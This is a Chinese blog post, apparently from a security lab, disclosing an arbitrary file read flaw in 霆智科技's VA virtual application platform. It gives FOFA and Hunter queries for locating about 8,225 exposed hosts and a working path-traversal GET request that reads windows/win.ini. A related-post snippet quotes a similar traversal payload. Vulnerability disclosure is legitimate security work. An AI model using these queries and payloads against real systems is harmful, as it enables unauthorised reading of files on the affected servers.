霆智科技 VA虚拟应用平台 任意文件读取漏洞

最新推荐文章于 2023-07-19 09:37:22 发布
最新推荐文章于 2023-07-19 09:37:22 发布
阅读量348 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79099363/article/details/131713861
版权

0x01 阅读须知

天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

(一) VA虚拟应用平台

霆智科技的VA虚拟应用平台是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。虚拟助手是一种人工智能系统,通过自然语言处理、机器学习和其他相关技术,能够与用户进行对话,并执行各种任务和服务。

FOFA语法:

body="EAA益和应用接入系统"

hunter语法:

web.body="EAA益和应用接入系统"

    hunter共8,225条资产
 


(二) 漏洞poc

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1Host:

更多漏洞POC发布在知识星球

  

 星球的最近主题和星球内部工具一些展示

Web安全漏洞最新1day分享漏洞挖掘技巧分享

0x03 修复方案

官方修复缓解措施

补丁链接

http://www.tzfse.com.cn/

天擎攻防实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
艾科思应用接入系统任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-13 156
艾科思应用接入系统(科技VA虚拟应用平台)是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。虚拟助手是一种人工能系统,通过自然语言处理、机器学习和其他相关技术,能够与用户进行对话,并执行各种任务和服务。该系统存在任意文件读取漏洞
艾科思应用接入系统存在任意文件读取漏洞
nnn2188185的博客
07-17 159
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发艾科思应用接入系统(科技VA虚拟应用平台?)是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。
天翼VA应用虚拟化软件 天翼VA应用虚拟化软件 v5.8.0
10-30
天翼VA应用虚拟平台,国内领先的应用交付远程接入平台,帮助用户在任何时间、任何地点、任何网络 环境下,通过PC、笔记本、PAD、手机等 任何可以上网的设备实时、快速地接入总
VA虚拟应用管理平台-单点登陆
weixin_34279184的博客
03-24 248
1、功能描述 单点登陆功能是将使用VA平台发布的软件(如金蝶) 的登陆关联到VA控制台相应用户的登陆.当使用VA用户登陆后,则可以直接进入相应权限的用户应用程序目录,而无需输入用户应用程序的用户名\密码等 VA虚拟应用管理平台具备完备的单点登陆功能,完备表现在: 1>.全面适用于基于C/S和B/S架构的 单点登陆 2>.直接通过三步拖拽或者导入配置文...
VA虚拟应用管理平台解决的问题及技术简介
weixin_34185320的博客
03-23 333
VA虚拟应用管理平台技术为企业管理人员提供了“集中管控,远程应用”的新方法,它所实施的网络架构支持当前几乎所有部署在台式机的应用程序,供实现任何地方、任何网络、任何时间、任何方式轻松接入,实现了企业“ALL IN ONE”的应用模式。 VA虚拟应用管理平台 VA虚拟应用管理平台将现有的服务器所有资源通过各种发布格式部署到用户服务器上,满足管理人员所面临的五个首要挑战: ...
艾科思(科技应用接入系统存在任意文件读取漏洞
holyxp的博客
07-19 275
艾科思应用接入系统(科技VA虚拟应用平台?)是一个创新的技术平台,旨在为用户提供虚拟助手(Virtual Assistant)的功能和服务。
常见漏洞修复方案
Guoke324的博客
09-09 9883
常见漏洞修复方案,漏洞修复
任意文件读取漏洞复现(CVE-2021-14544)
FODKING的博客
11-22 2914
海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 实验工具:burpsuite fodo 实验流程: 实现条件用fodo搜索用海康威视流媒体管理服务器的web端 1.发现它是弱口令直接用弱口令登录 admin 12345 就离谱 发现这应该是一个刚建立的不用的服务器 2.在日志文件中下载一个文件 3.用抓包软件抓取数据包 构建pyload …/…/…/…/…/…/…/windows/system32/drivers/etc/slt 4.发现数据包中存在任意
substring数组越界_浏览器漏洞:从数组越界到任意地址读写
weixin_39884492的博客
12-22 759
引言在现代的操作系统中,针对内存破坏方面的漏洞,提供了一系列的阻碍措施,类似DEP、CFG以及EMET。浏览器Exploit中,通过UAF/Double Free 乃至 堆溢出都能实现对内存的一定程度读写,但是碍于内存不可执行,浏览器利用中常常需要精确堆喷射结合ROP,前提是获取二进制文件(ELF/COFF)在内存中load的确切地址(地址泄漏)。文本暂时不讨论堆利用本身,会分别讨论两个浏览器漏洞...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【创新发文无忧】Matlab实现阿基米德优化算法AOA-DELM的故障诊断算法研究.rar
08-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
财务报表执行目录.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于Simulink仿真探讨TCSC对系统暂态稳定性影响
08-09
晶闸管的可控串联补偿装置(TCSC)是近年来串联补偿新技术的代表,是FACTS系统的主要组成部分。由于采用晶闸管代替传统串联补偿装置的机械开关,是TCSC可以快速、连续地改变所补偿输电线路的等值电抗,因而在一定的运行范围内,可以将此线路的输送功率控制为期望的常数。在暂态过程中,通过快速改变线路等值电抗,从而提高系统的稳定性。 从负载电压和功率波形中可以看出,没有安装TCSC时,发生三相故障,故障切除后,系统的功率发生较大振动,负载电压也包含很大的谐波分量,系统发生了功率震荡,不能符合电力系统的运行要求。若在系统中安装TCSC,当系统在0.2s发生故障时,电压和功率急剧减小,故障切除后,系统电压、有功功率和无功功率很快稳定下来。(请使用R2020及以上版本)
C#上位机与PLC通讯源码 C#与三菱PLC通讯MC协议
08-09
C#上位机与PLC通讯源码 C#与三菱PLC通讯MC协议
【BP预测】基于和声搜索算法优化BP神经网络实现风速数据预测附matlab代码.rar
08-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
假山叠水CAD合集及水池施工图.rar
08-09
假山叠水CAD合集及水池施工图
Linux操作实验-Linux初步了解+命令格式+命令操作
最新发布
08-09
1. 初步了解 Linux 的命令格式; 2. 学习如何连接 Linux 系统; 3. 实习几个文件维护命令; 4. 学会如何得到帮助信息; 5. 练习 echo、 whoami、 whatis、 hostname、 whereis、 set、 uptime、 alias、 cat 等几个常用的 Linux 命令。 6. 练习用 vi 编辑器编辑文本文件
机器学习面试知识点总结
08-09
该文档总结了机器学习面试所需要的知识点以及常见问题和对应的答案分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值